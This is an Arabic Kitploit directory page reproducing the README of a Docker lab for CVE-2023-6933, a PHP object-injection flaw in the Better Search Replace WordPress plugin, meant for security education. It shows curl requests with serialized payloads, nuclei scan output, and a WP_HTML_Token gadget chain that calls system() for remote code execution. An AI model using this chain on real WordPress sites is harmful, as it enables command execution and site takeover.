Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
vulnerable-bsr-lab-CVE-2023-6933 — مختبر عملي لـ CVE-2023-6933، وهي ثغرة حقن كائن PHP في إضافة Better Search Replace لـ WordPress، مع نشر Docker وقالب nuclei ونصوص استغلال للبحث الأمني والتعليم. | Kitploit
أدوات/GitHubGitHub/trex96/vulnerable-bsr-lab-cve-2023-6933
أطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubtrex96/vulnerable-bsr-lab-cve-2023-6933

vulnerable-bsr-lab-CVE-2023-6933

مختبر عملي لـ CVE-2023-6933، وهي ثغرة حقن كائن PHP في إضافة Better Search Replace لـ WordPress، مع نشر Docker وقالب nuclei ونصوص استغلال للبحث الأمني والتعليم.

عرض المستودع
4منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر ثغرة CVE-2023-6933

نظرة عامة

يُظهر هذا البيئة المختبرية ثغرة CVE-2023-6933، وهي ثغرة خطيرة من نوع حقن كائنات PHP في إضافة Better Search Replace لووردبريس بإصدارات ≤1.4.4.

تفاصيل الثغرة

  • معرف CVE: CVE-2023-6933
  • درجة CVSS: 9.8 (حرجة)
  • الإضافة المتأثرة: Better Search Replace ≤1.4.4
  • نوع الثغرة: حقن كائنات PHP عبر إدخال مستخدم غير آمن (unserialize)
  • ناقل الهجوم: نقطة نهاية AJAX /wp-admin/admin-ajax.php مع الإجراء search_replace_db

بداية سريعة

1. نشر المختبر

root@kitploit:~
# Clone the repository
git clone https://github.com/Trex96/vulnerable-bsr-lab-CVE-2023-6933.git
cd vulnerable-bsr-lab-CVE-2023-6933

# Deploy using Docker Hub image (automatic pull)
docker-compose up -d

سيعمل المختبر تلقائياً على:

  • سحب صورة ووردبريس المعرضة للخطر من Docker Hub (trex999/vulnerable-bsr-lab:latest)
  • إعداد ووردبريس مع MySQL وphpMyAdmin
  • تثبيت وتفعيل إضافة Better Search Replace المعرضة للخطر (الإصدار 1.4.4)
  • إكمال التثبيت في حوالي 60 ثانية

2. الوصول إلى البيئة

  • WordPress: http://localhost:8080
  • لوحة الإدارة: http://localhost:8080/wp-admin (admin/admin123)
  • phpMyAdmin: http://localhost:8081 (root/rootpassword)

3. اختبار الثغرة

root@kitploit:~
# Run the automated POC
nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v

# Manual testing via curl
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d 'action=search_replace_db&search_for=O:8:"stdClass":1:{s:6:"marker";s:34:"nuclei_test_payload_demonstration";}&replace_with=test'

تحليل تقني

الثغرة

تحتوي إضافة Better Search Replace على ثغرة حقن كائنات PHP في معالج AJAX الخاص بها. تحدث الثغرة عندما:

  1. يتم تمرير إدخال المستخدم إلى المعامل search_for عبر POST إلى /wp-admin/admin-ajax.php
  2. يتم تعيين الإجراء على search_replace_db
  3. يحتوي الإدخال على كائنات PHP متسلسلة يتم إلغاء تسلسلها دون تحقق مناسب
  4. وهذا يسمح بإنشاء كائنات عشوائية وتنفيذ تعليمات برمجية محتمل

طرق التحقق من الإثبات العملي (PoC)

يوضح قالب nuclei الخاص بنا الثغرة عبر مراحل تحقق متعددة:

  1. كشف الإضافة: يؤكد وجود إصدار الإضافة المعرضة للخطر
  2. اختبار حقن الكائنات: يرسل حمولات متسلسلة ويحلل الاستجابات
  3. التحقق السلوكي: يؤكد معالجة إلغاء تسلسل الكائنات بنجاح

الميزات الرئيسية لهذا المختبر

  • لا اعتماد على الأخطاء: يُظهر الإثبات العملي الثغرة الفعلية من خلال التحليل السلوكي، وليس رسائل الخطأ
  • اختبار وظيفي: يستخدم كائنات متسلسلة آمنة للتحقق من إلغاء التسلسل دون إتلاف النظام
  • نشر آلي: إعداد مختبر كامل بدون تهيئة يدوية
  • طرق اختبار متعددة: كل من قوالب nuclei الآلية وأوامر curl اليدوية

التوثيق

مرجع سريع

  • README.md: هذا الملف - بداية سريعة ونظرة عامة
  • CVE-2023-6933_POC_DOCUMENTATION.md: توثيق تقني كامل مع تحليل مفصل للإثبات العملي
  • POC_TEMPLATE_SUMMARY.md: الامتثال للمتطلبات وتأكيد التسليم

قالب إثبات عملي احترافي

قالب nuclei (nuclei-templates/cve-2023-6933.yaml) منظم بشكل احترافي:

  • كود نظيف بدون تعليقات مفرطة
  • توثيق تقني شامل في ملفات منفصلة
  • تنسيق قالب جاهز للإنتاج
  • امتثال كامل لمعايير البحث الأمني

نتائج الاختبار

تنفيذ الإثبات العملي بنجاح

root@kitploit:~
$ nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v

[CVE-2023-6933:plugin_version] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["trunk"]
[CVE-2023-6933:tested_up_to] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["6.4"]
[CVE-2023-6933:response_content] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
[CVE-2023-6933:poc_verification] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]

[INF] Scan completed in 67ms. 4 matches found.

الإثبات العملي نجح في:

  • ✅ كشف إصدار الإضافة المعرضة للخطر
  • ✅ تأكيد قدرة حقن الكائنات من خلال تحليل الاستجابة
  • ✅ عرض الثغرة الوظيفية دون اعتماد على الأخطاء
  • ✅ تقديم تحقق سلوكي من نجاح إلغاء التسلسل

إشعار أمني

⚠️ تحذير: تحتوي هذه البيئة على برامج معرضة للخطر بشكل متعمد. استخدمها فقط في بيئات اختبار معزولة. لا تنشرها في بيئات الإنتاج أو الأنظمة المتصلة بالإنترنت.

التنظيف

root@kitploit:~
docker-compose down -v

المراجع

  • تفاصيل CVE-2023-6933
  • إضافة Better Search Replace
  • توثيق حقن كائنات PHP

أُنشئ للأغراض التعليمية والبحث الأمني

بيئة Docker (Docker_LAB_SETUP/)

  • WordPress 6.4.0 مع إضافة Better Search Replace 1.4.3 المعرضة للخطر
  • MySQL 8.0 خادم قاعدة بيانات
  • phpMyAdmin لإدارة قاعدة البيانات
  • بيئة معرضة للخطر مسبقة التهيئة

نصوص الاستغلال

  • cve_2023_6933_exploit.php - مجموعة أدوات استغلال PHP شاملة
  • wp_html_token_poc.php - عرض تنفيذ تعليمات برمجية عن بعد (RCE) لووردبريس 6.4.0+
  • bsr_direct_exploit.php - اختبار ثغرة مباشر

أدوات الكشف

  • nuclei-templates/cve-2023-6933.yaml - قالب nuclei متقدم
  • manual-test.sh - سكريبت اختبار يدوي شامل

🎯 منهجية الاستغلال الصحيحة

يوضح هذا المختبر الكشف غير المعتمد على الأخطاء باتباع أفضل الممارسات لأبحاث الثغرات:

1. الكشف القائم على النجاح

بدلاً من الاعتماد على أخطاء HTTP 500، تكتشف أدواتنا:

  • معالجة الحمولة بنجاح
  • إلغاء تسلسل الكائنات المتسلسلة
  • أنماط استجابة التطبيق
  • دليل استغلال وظيفي

2. سلسلة RCE لـ WP_HTML_Token

استخدام فئة WP_HTML_Token في ووردبريس 6.4.0+ لتحقيق RCE فعلي:

root@kitploit:~
O:13:"WP_HTML_Token":4:{
    s:13:"bookmark_name";s:14:"touch /tmp/rce";
    s:9:"node_name";s:8:"testnode";
    s:21:"has_self_closing_flag";b:0;
    s:10:"on_destroy";s:6:"system";
}

3. نواقل هجوم متعددة

  • استغلال نقطة نهاية AJAX (admin-ajax.php)
  • التلاعب المباشر بواجهة الإضافة
  • حقن قاعدة البيانات عبر عمليات البحث/الاستبدال

🔬 نهج الاختبار

الاختبار اليدوي

root@kitploit:~
# Test basic plugin presence
curl "http://localhost:8080/wp-content/plugins/better-search-replace/readme.txt"

# Test vulnerability with safe payload
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -d "action=bsr_search_replace&search_for=O:8:\"stdClass\":1:{s:4:\"test\";s:8:\"nuclei\";}&replace_with=safe&select_tables[]=wp_posts&dry_run=1"

ميزات قالب Nuclei

  • اختبار متعدد النواقل: 5 طلبات HTTP مختلفة
  • مطابقات قائمة على النجاح: يبحث عن المعالجة الوظيفية، وليس الأخطاء
  • استخراج شامل: كشف الإصدار، تحليل الاستجابة
  • حمولات آمنة: نهج اختبار غير مدمر

ميزات الاختبار اليدوي

  • كشف إصدار الإضافة والتحقق منه
  • توليد واختبار حمولات متعددة
  • عرض RCE لـ WP_HTML_Token
  • التحقق الشامل من الثغرة

📊 نقاط الوصول إلى المختبر

الخدمةالرابطبيانات الدخول
WordPresshttp://localhost:8080admin/admin
phpMyAdminhttp://localhost:8081root/rootpassword

🛡️ اعتبارات أمنية

للباحثين

  • هذه بيئة معرضة للخطر بشكل متعمد
  • استخدمها فقط في شبكات معزولة/متحكم بها
  • ليست لبيئات الإنتاج
  • للأغراض التعليمية فقط

للمدافعين

  • قم بتحديث Better Search Replace إلى ≥ 1.4.5
  • طبق قواعد جدار حماية تطبيقات الويب (WAF) للبيانات المتسلسلة
  • راقب أنماط حقن الكائنات
  • تدقيق أمني منتظم لإضافات ووردبريس

📚 القيمة التعليمية

يوفر هذا المختبر خبرة عملية في:

  • ثغرات حقن كائنات PHP
  • تحليل أمن إضافات ووردبريس
  • هجمات التسلسل/إلغاء التسلسل
  • استغلال سلاسل الأدوات (gadget chains)
  • أتمتة كشف الثغرات
  • منهجيات اختبار الأمان

المؤلف: Trex
إصدار المختبر: 2.0 - منهجية إثبات عملي محسنة

تنزيل الأداة